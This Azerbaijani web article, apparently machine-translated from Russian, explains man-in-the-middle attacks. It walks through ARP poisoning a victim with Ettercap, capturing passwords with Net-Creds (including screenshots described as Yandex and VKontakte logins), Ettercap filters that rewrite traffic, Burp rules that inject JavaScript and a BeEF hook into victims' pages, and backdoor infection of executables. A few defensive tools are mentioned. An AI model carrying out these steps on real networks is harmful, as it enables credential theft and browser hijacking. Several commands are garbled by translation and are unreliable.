ev › Quraşdırma və konfiqurasiya › Hakerlər ondan trafiki yönləndirmək üçün istifadə edirlər. Haker hücumlarının üsulları. Burp ilə məlumatların saxtalaşdırılması

Hakerlər ondan trafiki yönləndirmək üçün istifadə edirlər. Haker hücumlarının üsulları. Burp ilə məlumatların saxtalaşdırılması

Şəbəkə trafikinin qarşısının alınması üsulları

Şəbəkə analizator proqramlarından istifadə edərək şəbəkəyə qulaq asmaq birincidir, ən çox sadə şəkildə məlumatların tutulması.

Şəbəkəni dinləmədən qorumaq üçün istifadə edin xüsusi proqramlar məsələn, şəbəkə trafikini dinləyən şəbəkədəki kompüterləri müəyyən etməyə qadir olan AntiSniff.

Onların problemlərini həll etmək üçün antisniffer proqramları şəbəkədə dinləmə qurğularının mövcudluğunun xüsusi işarəsindən istifadə edir - snayfer kompüterinin şəbəkə kartı xüsusi dinləmə rejimində olmalıdır. Dinləmə rejimində olarkən, şəbəkə kompüterləri sınaqdan keçirilən hosta göndərilən IP dataqramlarına xüsusi şəkildə reaksiya verir. Məsələn, dinləyən hostlar adətən hostun ünvanına göndərilən dataqramları deyil, bütün daxil olan trafiki emal edir. AntiSniff-in tanıya biləcəyi şübhəli host davranışını göstərən digər əlamətlər də var.

Şübhəsiz ki, dinləmə hücumçu baxımından çox faydalıdır, çünki bu, bir çox faydalı məlumatları əldə etməyə imkan verir - şəbəkə üzərindən ötürülən parollar, şəbəkə kompüterlərinin ünvanları, məxfi məlumatlar, məktublar və s. Bununla belə, sadə dinləmə bir hakerə məlumatları dəyişdirmək və korlamaq üçün iki host arasında şəbəkə rabitəsinə müdaxilə etməyə imkan vermir. Belə bir problemi həll etmək üçün daha mürəkkəb texnologiya tələb olunur.

düyü. 1 Yanlış ARP sorğuları

Gəlin görək haker A və B hostları arasında şəbəkə rabitəsini kəsmək üçün ARP-dən necə istifadə edə bilər.

A və B hostları arasında şəbəkə trafikinə müdaxilə etmək üçün haker öz IP ünvanını bu hostlara tətbiq edir ki, A və B mesaj mübadiləsi zamanı bu saxta IP ünvanından istifadə etsinlər. İP ünvanını tətbiq etmək üçün haker aşağıdakı əməliyyatları yerinə yetirir.

Təcavüzkar, məsələn, W2RK paketindən nbtstat əmrindən istifadə edərək, A və B hostlarının MAC ünvanlarını müəyyən edir.
Təcavüzkar A və B hostlarının müəyyən edilmiş MAC ünvanlarına mesajlar göndərir ki, bu da hostların İP ünvanlarını kompüterlərin MAC ünvanlarına həll etmək sorğularına ARP tərəfindən saxtalaşdırılmış cavablardır. Host A-ya məlumat verilir ki, B hostunun IP ünvanı təcavüzkarın kompüterinin MAC ünvanına uyğundur; B hostuna məlumat verilir ki, A hostunun IP ünvanı həm də təcavüzkarın kompüterinin MAC ünvanına uyğundur.
A və B hostları qəbul edilmiş MAC ünvanlarını ARP keşlərində saxlayır və sonra onlardan bir-birinə mesaj göndərmək üçün istifadə edirlər. A və B IP ünvanları təcavüzkarın kompüterinin MAC ünvanına uyğun gəldiyindən, A və B hostları heç bir şübhə etmədən mesajları ilə hər şeyi edə bilən bir vasitəçi vasitəsilə əlaqə qurur.

UNIX şəbəkələrində bu tip saxtalaşdırılmış ARP sorğu hücumu şəbəkə trafikini izləmək və idarə etmək üçün sistem utilitlərindən istifadə etməklə həyata keçirilə bilər, məsələn, arpredirect. Təəssüf ki, belə etibarlı yardım proqramları Windows şəbəkələrində tətbiq olunmur. Məsələn, NTsecurity veb saytında şəbəkə hostları arasında trafikin yönləndirilməsi üçün bir vasitə kimi təqdim olunan GrabitAII yardım proqramını yükləyə bilərsiniz. Bununla belə, GrabitAII yardım proqramının funksionallığının əsas yoxlanışı göstərir ki, onun funksiyalarının həyata keçirilməsində tam uğur hələ çox uzaqdadır.

Şəbəkə trafikinə müdaxilə etmək üçün təcavüzkar, məsələn, saxtalaşdırılmış ICMP Yönləndirmə mesajlarından istifadə edərək, öz IP ünvanları ilə şəbəkə marşrutlaşdırıcısının həqiqi IP ünvanını aldada bilər. Host A, RFC-1122-yə uyğun olaraq, qəbul edilmiş Yönləndirmə mesajını başqa bir hosta göndərilən dataqrama cavab kimi qəbul etməlidir, məsələn, B. Host A qəbul edilmiş Yönləndirmə mesajının məzmununa əsasən Yönləndirmə mesajı üzərində öz hərəkətlərini müəyyən edir, və əgər dataqramın yönləndirilməsi yeni marşrut üzrə A-dan B-yə Yönləndirmədə göstərilibsə, host A məhz bunu edəcək.

düyü. 2 Yanlış marşrutlaşdırma

Yanlış marşrutlaşdırma həyata keçirmək üçün təcavüzkar təşkilat haqqında bəzi detalları bilməlidir yerli şəbəkə, hansı host A-nın yerləşdiyi, xüsusən də A hostundan B-yə trafikin göndərildiyi marşrutlaşdırıcının IP ünvanı. Bunu bilən təcavüzkar, göndərənin IP ünvanının marşrutlaşdırıcının İP-si kimi təyin olunduğu IP dataqramını yaradacaq. ünvanı və alıcı A hostu göstərilmişdir. Həmçinin dataqrama yeni marşrutlaşdırıcının ünvan sahəsi təcavüzkarın kompüterinin IP ünvanına təyin edilmiş ICMP Yönləndirmə mesajı daxildir. Belə bir mesajı alan A hostu bütün mesajları təcavüzkarın kompüterinin IP ünvanına göndərəcək.

Belə hücumdan qorunmaq üçün siz A hostunda ICMP Redirect mesajlarının işlənməsini söndürməlisiniz (məsələn, firewalldan istifadə etməklə) və tracert əmri (Unix-də bu tracerout əmridir) təcavüzkarın kompüterinin IP ünvanını aşkar edə bilər. . Bu kommunal xidmətlər, əlbəttə ki, şəbəkə inzibatçısı sayıq olmadıqda, yerli şəbəkədə görünən və quraşdırma zamanı nəzərdə tutulmayan əlavə marşrut tapmağa qadirdir.

Yuxarıdakı ələ keçirmə nümunələri (təcavüzkarların imkanları məhdud deyil) məlumatlarda məxfi məlumat varsa, şəbəkə üzərindən ötürülən məlumatların qorunmasının zəruriliyinə inandırır. Şəbəkə trafikinin tutulmasından qorunmağın yeganə üsulu kriptoqrafik alqoritmləri və şifrələmə protokollarını həyata keçirən və məxfi məlumatların açıqlanmasının və dəyişdirilməsinin qarşısını alan proqramların istifadəsidir. Bu cür problemləri həll etmək üçün kriptoqrafiya təhlükəsiz protokollar vasitəsilə ötürülən mesajların şifrlənməsi, imzalanması və həqiqiliyini yoxlamaq üçün vasitələr təqdim edir.

Məlumat mübadiləsini qorumaq üçün bütün kriptoqrafik metodların praktiki tətbiqi təmin edilir VPN şəbəkələri(Virtual Şəxsi Şəbəkə - Virtual şəxsi şəbəkələr).

TCP bağlantısının kəsilməsi

Bir haker hücuma məruz qalan hosta TCP paketləri yaradaraq və göndərməklə host ilə cari ünsiyyət seansını kəsdiyi zaman ən mürəkkəb şəbəkə trafikinin ələ keçirilməsi hücumu TCP bağlantısının tutulması (TCP hijacking) hesab edilməlidir. Daha sonra, TCP protokolunun kəsilmiş TCP əlaqəsini bərpa etmək qabiliyyətindən istifadə edərək, haker kəsilmiş rabitə seansına müdaxilə edir və əlaqəsi kəsilmiş müştəri əvəzinə onu davam etdirir.

TCP protokolu (Transmission Control Protocol) əsas nəqliyyat protokollarından biridir. OSI səviyyəsi, virtual rabitə kanalı üzərində məntiqi əlaqələr yaratmağa imkan verir. Bu kanal üzərindən paketlər onların ardıcıllığı qeydə alınmaqla ötürülür və qəbul edilir, paketlərin hərəkətinə nəzarət edilir, təhrif olunmuş paketlərin təkrar ötürülməsi təşkil edilir və sessiyanın sonunda rabitə kanalı qırılır. TCP yeganə protokoldur əsas protokol qabaqcıl mesaj identifikasiyası və əlaqə sisteminə malik olan TCP/IP ailəsindən.

Proqram paketi snayferlərinə ümumi baxış

Bütün proqram snifferləri iki kateqoriyaya bölünə bilər: işə salmağı dəstəkləyən sniffers komanda xətti, və qrafik interfeys ilə iyləyir. Bununla belə, qeyd edirik ki, bu imkanların hər ikisini özündə birləşdirən snayferlər var. Bundan əlavə, snifferlər bir-birindən dəstəklədikləri protokollara, ələ keçirilən paketlərin təhlilinin dərinliyinə, filtrləri konfiqurasiya etmək qabiliyyətinə və digər proqramlarla uyğunluq imkanlarına görə fərqlənirlər.

Adətən hər hansı bir sniffer pəncərəsi ilə qrafik interfeysüç sahədən ibarətdir. Onlardan birincisi ələ keçirilən paketlərin xülasə məlumatlarını göstərir. Tipik olaraq, bu sahə minimum sahələri göstərir, yəni: paketin tutulma vaxtı; paket göndərən və alıcının IP ünvanları; Paketin göndərici və alıcısının MAC ünvanları, mənbə və təyinat port ünvanları; protokol növü (şəbəkə, nəqliyyat və ya tətbiq səviyyəsi); ələ keçirilən məlumatlar haqqında bəzi ümumi məlumat. İkinci sahə fərdi seçilmiş paket haqqında statistik məlumatı, nəhayət üçüncü sahədə paketi onaltılıq və ya ASCII simvol şəklində göstərir.

Demək olar ki, bütün paket snifferləri deşifrə olunmuş paketləri təhlil etməyə imkan verir (buna görə də paket snifferlərinə paket analizatorları və ya protokol analizatorları da deyilir). Sniffer ələ keçirilən paketləri təbəqələr və protokollar arasında paylayır. Bəzi paket snifferləri protokolu tanımaq və ələ keçirilən məlumatları göstərmək qabiliyyətinə malikdir. Bu tip məlumat adətən sniffer pəncərəsinin ikinci sahəsində göstərilir. Məsələn, hər hansı bir sniffer TCP protokolunu tanıya bilər və qabaqcıl snifferlər bu trafiki hansı tətbiqin yaratdığını müəyyən edə bilər. Əksər protokol analizatorları 500-dən çox müxtəlif protokolları tanıyır və onları adla təsvir edə və deşifrə edə bilir. Sniffer nə qədər çox məlumatı deşifrə edə və ekranda göstərə bilsə, bir o qədər əl ilə deşifrə edilməli olacaq.

Paket snifferlərinin qarşılaşa biləcəyi problemlərdən biri standart portdan başqa bir portdan istifadə edərək protokolu düzgün müəyyən edə bilməməkdir. Məsələn, təhlükəsizliyi yaxşılaşdırmaq üçün bəzi tanınmış proqramlar standart portlardan başqa portlardan istifadə etmək üçün konfiqurasiya edilə bilər. Beləliklə, veb server üçün qorunan ənənəvi port 80 əvəzinə, bu server Siz onu 8088 portuna və ya hər hansı digərinə zorla yenidən konfiqurasiya edə bilərsiniz. Bu vəziyyətdə bəzi paket analizatorları protokolu düzgün təyin edə bilmir və yalnız aşağı səviyyəli protokol (TCP və ya UDP) haqqında məlumatları göstərə bilmir.

Pluginlər və ya quraşdırılmış modullar kimi proqram analitik modulları ilə birlikdə gələn proqram snifferləri var ki, onlar ələ keçirilən trafik haqqında faydalı analitik məlumatlarla hesabatlar yaratmağa imkan verir.

Əksər proqram paket analizatorlarının başqa bir xarakterik xüsusiyyəti, trafikin tutulmasından əvvəl və sonra filtrləri konfiqurasiya etmək qabiliyyətidir. Filtrlər ümumi trafikdən müəyyən paketləri verilmiş kriteriyaya uyğun seçir ki, bu da trafiki təhlil edərkən lazımsız məlumatlardan xilas olmağa imkan verir.

Ettercap üçün alternativlər

Ettercap ən populyar hücum proqramıdır, lakin ən yaxşısıdır? Bütün təlimatlar boyunca Ettercap-ın demək olar ki, heç vaxt tək istifadə olunmadığını, bu və ya digər proqramın həmişə onunla trafik emal zəncirində qurulduğunu görəcəksiniz. Bəlkə də bu, çeviklik əlavə edir, ümumiyyətlə, bu yanaşma UNIX-in əsasını təşkil edir - bir proqram bir tapşırığı yerinə yetirir və son istifadəçi istənilən nəticəni əldə etmək üçün müxtəlif proqramları birləşdirir. Bu yanaşma ilə proqram kodunu saxlamaq daha asandır, belə miniatür "kərpiclərdən" istənilən mürəkkəblik və çeviklik sistemi qura bilərsiniz. Bununla birlikdə, müxtəlif tapşırıqları olan, proqramları bir nəticə əldə etməyə yönəlmiş beş açıq konsola sahib olmaq çox rahat deyil, sadəcə olaraq daha mürəkkəbdir, hansısa mərhələdə səhv etmək ehtimalı var və bütün konfiqurasiya edilmiş sistem boşuna işləyəcək.

Net-Creds burnu:

Ziyarət edilmiş URL-lər
POST sorğuları göndərildi
HTTP formalarından girişlər/parollar
əsas HTTP autentifikasiyası üçün girişlər/parollar
HTTP axtarışları
FTP girişləri/parolları
IRC girişləri/parolları
POP girişləri/parolları
IMAP girişləri/parolları
Telnet girişləri/parolları
SMTP girişləri/parolları
SNMP icma sətri
HTTP, SMB, LDAP və s. kimi bütün dəstəklənən NTLMv1/v2 protokolları.
Kerberos

Tutulanların yaxşı seçimi və driftnet bu baxımdan daha sadədir - bu, yalnız kəsilmiş şəkilləri göstərir.

Maşınınızı yönləndirmə rejiminə keçirin.

Echo "1" > /proc/sys/net/ipv4/ip_forward

Qrafik interfeys (-G) ilə Ettercap-ı işə salın:

Ettercap-G

İndi Hostları seçin, Hostlar üçün Scan alt elementi var. Skan tamamlandıqdan sonra Host siyahısı seçin:

Hədəf1 olaraq, marşrutlaşdırıcını seçin (Hədəf 1-ə əlavə et), Hədəf2 kimi hücum edəcəyiniz cihazı seçin (Hədəf 2-yə əlavə edin).

Ancaq burada ilk problem yarana bilər, xüsusən də bir çox host varsa. Müxtəlif təlimatlarda, o cümlədən yuxarıda təqdim olunan videoda, müəlliflər hədəf maşına dırmaşırlar (hər kəsin nədənsə Windows var) və əmrdən istifadə edərək yerli şəbəkədə bu maşının IP-sinə baxırlar. Razılaşın, bu seçim real şərtlər üçün qəbuledilməzdir.

istifadə edərək skan etsəniz, bir qədər əldə edə bilərsiniz Əlavə informasiya hostlar haqqında, daha doğrusu, şəbəkə kartı istehsalçısı haqqında:

Nmap -sn 192.168.1.0/24

Məlumat hələ də kifayət deyilsə, OS-ni müəyyən etmək üçün bir skan edə bilərsiniz:

Nmap -O 192.168.1.0/24

Gördüyümüz kimi, IP 192.168.1.33 olan maşın Windows olduğu ortaya çıxdı, əgər bu yuxarıdan bir işarə deyilsə, onda nədir? 😉 LOL

Bu, ikinci məqsəd olaraq əlavə etdiyimiz şeydir.

İndi Mitm menyusuna keçin. Orada ARP zəhərlənməsini seçin... Uzaqdan Sniff bağlantıları üçün qutuyu yoxlayın.

Məhsul yığmağa başlayırıq, bir pəncərədə işə salırıq

Net kreditlər

başqasında (hər iki proqram seçimsiz işlədilə bilər)

Driftnet

Məlumatların toplanması dərhal başladı:

Sağ tərəfdə, driftnet tutulan şəkilləri göstərən başqa bir pəncərə açdı. Net-creds pəncərəsində ziyarət edilən saytları və ələ keçirilən parolları görürük:

1.2 Ettercap + Burp Suite
3. Ettercap-da dataya (ziyarət edilən saytlar və ələ keçirilmiş parollar) baxın

Görünüş menyusunda Əlaqələr və Profillər nişanlarına çıxışımız var. IP ünvanlarını həll et qutusunu da yoxlaya bilərsiniz. Əlaqələr, əlbəttə, əlaqələrdir. Ettercap kəşf etdiyi hər host üçün yaddaşda profillər toplayır. İstifadəçilər və parollar orada toplanır. Bu halda, tutulan hesab məlumatları (parollar) olan profillər çarpaz işarə ilə qeyd olunur:

Profillərə çox etibar etməyə ehtiyac yoxdur - məsələn, FTP və digər xidmətlər üçün ələ keçirilmiş giriş və parollar qeyd olunur, bunun üçün proqram etimadnamə kimi qəbul edilən məlumatları aydın şəkildə şərh edə bilər. Buraya, məsələn, əsas autentifikasiya məlumatları, veb formalara daxil edilmiş girişlər və parollar daxil deyil.

Əlaqələrdə ən perspektivli məlumatlar ulduz işarəsi ilə qeyd olunur:

Təfərrüatlara baxmaq üçün bu qeydlərə iki dəfə klikləyə bilərsiniz:

Siyahıda bu ulduzları axtarmamaq üçün bu sahəyə görə çeşidləyə bilərsiniz və onların hamısı yuxarıda və ya aşağıda görünəcək:

Yaxalanan Əsas Doğrulama:

Yandex üçün giriş-parol (aşağıda vurğulanmışdır):

Bunlar VKontakte üçün ələ keçirilən etimadnamələrdir:

Həmçinin, ən maraqlı məlumatlar aşağı konsolda toplanır:

Proqramın nəticələrini saxlamaq istəyirsinizsə, bu seçimlərdən istifadə edin (Ettercap-ı işə salarkən düymələri göstərin:

Giriş seçimləri: -w, --pcapfile-ə yazın, --yazılan məlumatları pcapfile-ə yazın -L, --log bütün trafiki bu fayla yazın -l, --log-info yalnız passiv məlumat yazın -m, --log-msg bütün mesajları yazın bu -c, --compress-də log faylları üçün gzip sıxılmasını istifadə edin

4. Ettercap-da məlumatların dəyişdirilməsi
4.1 Ettercap Xüsusi Filtrlərindən istifadə

Qeyd: Bütün sınaqlara baxmayaraq, Ettercap filtrləri hələ də mənim üçün işləmədi. Bunun əllər, aparat xüsusiyyətləri və ya proqramın özündə bir səhv olduğunu başa düşmək çətindir ... Lakin 0.8.2 versiyası (hazırda ən son) üçün filtrlərlə bağlı problemlər haqqında bir səhv hesabatı var. Ümumiyyətlə, səhv hesabatlarına və forumlara görə, filtrlər ya tez-tez düşür, ya da uzun müddət heç işləmir. 5 ay əvvəl dəyişikliklərin edildiyi bir filial var https://github.com/Ettercap/ettercap/tree/filter-improvements, yəni. filtr təkmilləşdirmələri (filtr təkmilləşdirmələri ilə). Həm bu filial üçün, həm də repozitoriyadan olan versiya üçün müxtəlif testlər aparıldı, müxtəlif filtrlər müxtəlif şərtlərdə sınaqdan keçirildi, çox vaxt sərf olundu, lakin heç bir nəticə olmadı. Yeri gəlmişkən, Kali Linux-da filtr təkmilləşdirmə versiyasını quraşdırmaq üçün bunu etməlisiniz:

Sudo apt-get ettercap-qrafik ettercap-ümumi sudo apt-get quraşdırmaq git debhelper bison yoxlamaq cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-curlibv1vdev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-inprovements https://github.com/Ettercap/ettercap.git cd ettercap build cdfdfcs/ build_dmk =On ../ make sudo make install

Ümumiyyətlə, filtrləriniz işləmirsə, deməli tək deyilsiniz. Ettercap haqqında təlimatlarda mən filtrlər mövzusunu atlaya bilmərəm, buna görə də hər halda onlar müzakirə olunacaq.

İndiyə qədər biz ARP saxtakarlığı üçün Ettercap istifadə etmişik. Bu çox səthi bir tətbiqdir. Fərdi filtrlər sayəsində biz tez bir zamanda trafikə müdaxilə edə və dəyişə bilərik. Filtrlər ayrıca fayllarda olmalıdır və istifadə etməzdən əvvəl Etterfilter proqramından istifadə etməklə tərtib edilməlidir. Linkin verildiyi sənədlər az görünsə də, aşağıda verilmiş nümunələrlə birləşsə də, kifayət qədər maraqlı filtrlər yazmağa imkan verəcəkdir.

Gəlin ilk filtrimizi yaradaq, o, bütün şəkilləri bununla əvəz edəcək:

img_replacer.filter adlı faylda surəti:

Əgər (ip.proto == TCP && tcp.dst == 80) ( əgər (axtarış(DATA.data, "Qəbul-Encoding")) ( əvəz et("Qəbul-Enkodlaşdırma", "Qəbul et-Zibil!"); # Qeyd: əvəzedici sətir orijinal mesajla eyni uzunluqdadır("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=") , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); dəyişdirin("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); dəyişdirin("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); dəyişdirin("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filtr Ran.\n"); )

Faylı tərtib edin:

Etterfilter img_replacer.filter -o img_replacer.ef

Kompilyasiya nəticələri:

Etterfilter 0.8.2 müəllif hüququ 2001-2015 Ettercap İnkişaf Qrupu 14 protokol cədvəli yükləndi: DƏKOD EDİLMİŞ MƏLUMAT udp tcp esp gre icmp ipv6 ip arp wifi fddi tr və 13 sabit yükləndi: VRRP OSPF ESPMP GRE UDP IPPPP6 IPPPing mənbə fayl "img_replacer.filter" tamamlandı. Meta ağacın açılması tamamlandı. Etiketlərin real ofsetlərə çevrilməsi tamamlandı. "img_replacer.ef" ünvanına çıxışın yazılması tamamlandı. -> 18 təlimata kodlaşdırılmış skript.

-F açarı proqrama keçiddən sonra gələn fayldan filtri yükləməyi bildirir. Kompilyasiyadan sonra filtrli yeni faylımızın adı img_replacer.ef-dir, buna görə də əmr formasını alır:

Ettercap -G -F img_replacer.ef

Qeyd: Veb trafikinə nəzarət etdiyiniz zaman gördüyünüz paketlər şifrələnmiş formada ola bilər. üçün səmərəli iş filtrlər, Ettercap şəklində trafikə ehtiyacı var sadə mətn. Bəzi müşahidələrə görə, veb səhifələrin istifadə etdiyi kodlaşdırma növü "Accept-Encoding: gzip, deflate"dir.

Aşağıda kodlaşdırmanın üzərinə yazan, düz mətn şəklində ünsiyyəti məcbur edən filtr var:

Əgər (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip"))) ( replace("gzip", " "); # qeyd: dəyişdirilmiş sətirdə dörd boşluq msg ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # qeyd: əvəz edilmiş sətirdə yeddi boşluq msg("ağlanmış deflate\n"); ) )

Filtrlərin yazılması sintaksisi ətraflı təsvir edilmişdir və sonra daha bir neçə nümunə var:

# paketdəki mətnin dəyişdirilməsi: əgər (ip.proto == TCP && axtarış(DATA.data, "lol"))( replace("lol", "smh"); msg("filtr işlədi"); ) # göstər mesaj , əgər tcp portu 22 olarsa if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH paketi\n"); ) ) # yazın bütün telnet trafiki, həmçinin hər bir paket üçün ./program if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23)) ( log(DATA.data, "./) logfile.log "); exec("./program"); ) ) # əgər http istisna olmaqla bütün trafiki qeyd edin (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # paket yükü ilə bağlı bəzi əməliyyatlar, əgər (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) başqa ( DATA.data = " dəyişdirilmiş"; DATA .data + 20 = 0x4445; ) # "ettercap" olan bütün paketləri buraxın if (axtarış(DECODED.data, "ettercap")) ( msg("kimsə bizim haqqımızda danışır...\n") ; drop( ); kill(); ) # if (ip.proto == TCP) ( if (tcp.src == 22 ||) adi ifadəsinə uyğun gələn şifrəsi açılmış ssh paketlərini qeyd edin tcp.dst == 22) ( əgər (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # öldürmə paketləri əgər (ip.ttl)< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp istifadə edərək məlumatların dəyişdirilməsi

Biz Ettercap və Burp-u 1.2-ci bənddə və ya 2.2-ci bənddə təsvir olunduğu kimi işə salırıq.

Burp-da Proksi -> Seçimlər bölməsinə keçin. Orada Match və Replace tapırıq. Yeni qayda əlavə etmək üçün Əlavə et klikləyin.

Sorğu başlığı sorğu başlığıdır
Sorğu orqanı - sorğu orqanı
Cavab başlığı - cavab başlığı
Cavab orqanı - cavab orqanı
Sorğu parametr adı - Sorğu parametr adı
Param dəyərini tələb et - Parametr dəyərini tələb et
Sorğunun birinci sətri - Sorğunun birinci sətri

GET metodu ilə ötürülən məlumatları dəyişdirmək lazımdırsa, bu, başlıqlara aiddir.

HTML işarələməsində head (head tag) kimi bir şey də var. Yuxarıda qeyd olunanların bu başlıqla heç bir əlaqəsi yoxdur. Bir az yuxarıda paket başlıqları haqqında danışırıq. Məzmunu dəyişdirmək istəyirsinizsə HTML səhifələri, sonra baş etiketinin məzmununu (məsələn, başlıq) dəyişdirmək niyyətində olsanız belə, həmişə Sorğu başlığı əvəzinə Cavab əsasını seçməlisiniz.

Əgər tanış deyilsinizsə müntəzəm ifadələr, onda, prinsipcə, narahat olmaq üçün heç bir şey yoxdur: HTML çox şeyi bağışlayır və başa düşmədiyi şeyləri sadəcə göz ardı edir - istifadə edə bilərsiniz. Əgər normal ifadələrdən istifadə etməyi bilirsinizsə, deməli sizə hörmət edirəm.)))

Məsələn, Sorğu başlığını Cavab orqanına dəyişən yeni qayda yaradaq. Qaydanın özündə biz dəyişəcəyik

Başlıq Yoxdur

Regex uyğunluğu qutusunu yoxlayın.

İndi bütün saytlarda (HTTPS olmadan) başlıq Başlıq Yox olacaq:

Bədən etiketindən sonra ixtiyari sətir daxil edin (mətndə ilk sətir olacaq). Sorğunun başlığı Cavab əsasına dəyişdirilir. Biz dəyişirik

Regex uyğunluğu qutusunu yoxlayın.

Yuxarı sağ küncdə (düzgündən asılı olaraq) “Mən sərinəm!” yazısı görünür. Siz CSS, JavaScript kodu, istənilən mətni - hər şeyi daxil edə bilərsiniz. Siz ümumiyyətlə hər şeyi səhifədən silə və sonra öz məzmununuzla doldura bilərsiniz - hamısı sizin təsəvvürünüzdən asılıdır.

İdeya, məlumatların orijinal serverə və təcavüzkarın serverinə göndərilməsi üçün hər bir formanı bir qədər dəyişdirmək idi (hər bir forma üçün çoxlu təqdimat həyata keçirin). Ancaq əsaslandıraraq ki, ötürülən məlumatlar şifrələnməyibsə və ona girişimiz varsa, deməli biz onu artıq görürük, onu heç bir serverə göndərməyə ehtiyac yoxdur. Bununla belə, kiməsə bir formadan eyni anda bir neçə serverə məlumat göndərmək üçün həqiqətən işləyən nümunə lazımdırsa.

5. BeEF ilə əlaqə

BeEF-in imkanlarından istifadə etməyə başlamaq üçün HTML koduna JavaScript faylını daxil etməliyik, adətən belə bir xətt:

Növbəti iki üsul yalnız bu sətirin yerləşdirilməsi üsulu ilə fərqlənir.

5.1 Ettercap filtrlərindən istifadə edərək BeEF-nin qoşulması

[bölmə daha sonra hazırlanacaq]

5.2 BeEF-ni Burp ilə birləşdirin

Tam olaraq 4.2-ci bənddə yazıldığı kimi başlamaq lazımdır. Yalnız başlıqları dəyişdirmək və sayta mətn əlavə etmək əvəzinə, JavaScript kodunu xətt şəklində tətbiq edəcəyik:

Mənim vəziyyətimdə bu fayl IP 192.168.1.36-da 3000 portda mövcuddur. Fayl hook.js adlanır (parametrlərdə dəyişdirilə bilər). Bunlar. mənim vəziyyətimdə xətti yeritməliyəm:

Bu, məsələn, yeni qayda yaratmaqla, Sorğu başlığını Cavab orqanına dəyişdirməklə edilə bilər. Dəyişdirmə HTML kodunun özündə baş verməlidir

Əla, HTTPS olmayan hər hansı veb saytı açdığınız zaman JavaScript kodu HTML koduna daxil edilir ki, bu da qarmaqlı brauzer vasitəsilə məlumat toplamağa və müxtəlif hücumlar həyata keçirməyə imkan verir:

6. Arxa qapılarla yoluxma

Siz həm Ettercap filtrlərindən [nədənsə artıq işləmir] və həm də istifadə edərək icra edilə bilən faylları əvəz edə və yoluxdura bilərsiniz. üçüncü tərəf proqramları. Məsələn, BDFProxy bunu tez bir zamanda edə bilər. Təəssüf ki, BDFProxy hələ də 2016-cı ilin aprelində Arxa qapı fabriki yeniləməsindən yayınır: libmproxy paketinin adı Python-da mitmproxy olaraq dəyişdirildi. BDFProxy üçün libmproxy paketi zəruri asılılıqdır, bu paket olmadan proqram başlamayacaq. Buna görə də, indi, BDFProxy-nin "təmirindən" əvvəl, ondan istifadə etmək mümkün deyil, çünki hətta Backdoor Factory quraşdırılmış olsa belə, BDFProxy proqramı libmproxy kitabxanasının olmamasından şikayətlənir...

Bənzər bir əməliyyat Burp Suite ilə edilə bilər. Addım-addım alqoritm təqdim olunur, bu bölmədə onu yenidən yazmağın mənası yoxdur.

7. Ettercap plaginlərindən istifadə

Ettercap plaginləri haqqında məlumat tapa bilərsiniz. Kifayət qədər çox sayda plagin var, aşağıda təsvir olunanlar mənə ən maraqlı gəlir.

Ettercap işə salındıqda plaginlər qoşula bilər, bunun üçün bir seçim var:

P, --plugin bunu işlədir

Pluginlər həmçinin GUI-dən yüklənə bilər:

[MATERİAL HAZIRLANIR]

7.1 arp_cop

O, ARP sorğularını/cavablarını passiv izləməklə şübhəli ARP fəaliyyətini bildirir. O, ARP zəhərlənmə cəhdləri və ya sadə İP münaqişələri və ya IP dəyişiklikləri barədə məlumat verə bilər. Əgər siz hostların ilkin siyahısını tərtib edirsinizsə, plagin daha dəqiq işləyəcək.

Ettercap -TQP arp_cop //

ARP saxtakarlığının real aşkarlanmasına misal:

Genişləndirin

